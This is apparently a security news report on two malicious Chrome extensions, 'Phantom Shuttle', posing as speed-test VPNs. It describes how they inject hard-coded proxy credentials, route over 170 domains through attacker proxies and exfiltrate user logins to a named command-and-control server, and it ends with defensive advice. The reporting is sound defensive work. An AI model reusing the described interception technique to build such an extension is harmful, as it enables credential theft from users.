Cybersecurity researchers discovered two malicious Google Chrome extensions that pose as a multi-location network speed test plug-in but can intercept traffic and capture user credentials, Socket researchers reported.
The add-ons are published under the same name, Phantom Shuttle, and were offered as paid services with subscription fees. Both variants were available for download as of writing: ID fbfldogmkadejddihifklefknmikncaj (about 2,000 users, published Nov. 26, 2017) and ID ocpcmfmiidofonkbodpdhgddhlcmcofd (about 180 users, published Apr. 27, 2023). Socket security researcher Kush Pandya said users paid subscriptions ranging from ¥9.9 to ¥95.9 CNY ($1.40 to $13.50 USD) believing they were buying a legitimate VPN service, while the extensions performed identical malicious operations.
The extensions bundle modified versions of two JavaScript libraries, jquery-1.12.2.min.js and scripts.js, that automatically inject hard-coded proxy credentials (topfany / 963852wei) into every HTTP authentication challenge by registering a listener on chrome.webRequest.onAuthRequired. Socket said the code uses asyncBlocking to respond to authentication challenges before the browser displays a credential prompt, enabling transparent credential injection while still performing real latency tests to reinforce the façade.
After proxy authentication, the extensions configure Chrome’s proxy settings using a Proxy Auto-Configuration script to implement three modes—close, always and smarty. The PAC approach is described in documentation such as the PAC guide. In smarty mode the extensions route a hard-coded list of more than 170 high-value domains through attacker-controlled proxies, including developer platforms, cloud services, enterprise solutions, social media and adult sites; Socket noted the inclusion of pornographic sites may be an attempt to facilitate blackmail.
Socket reported the extensions maintain a 60-second heartbeat to a command-and-control server at phantomshuttle.space and exfiltrate a VIP user’s email and password in plaintext and version information via an HTTP GET request every five minutes. The combination of continuous heartbeat exfiltration and proxy man-in-the-middle capability, Socket said, allows real-time traffic capture, response manipulation and arbitrary payload injection, putting credentials, cookies, form data, API keys and other sensitive material at risk.
The operation’s operators are unknown; Socket noted indicators such as Chinese-language descriptions, Alipay/WeChat Pay integration and use of Alibaba Cloud for hosting point to a China-based operation but said attribution is not confirmed. Users who have installed the extensions are advised to remove them, and security teams are urged to deploy extension allowlisting, monitor for extensions combining subscription payments with proxy permissions, and implement network monitoring for suspicious proxy authentication attempts.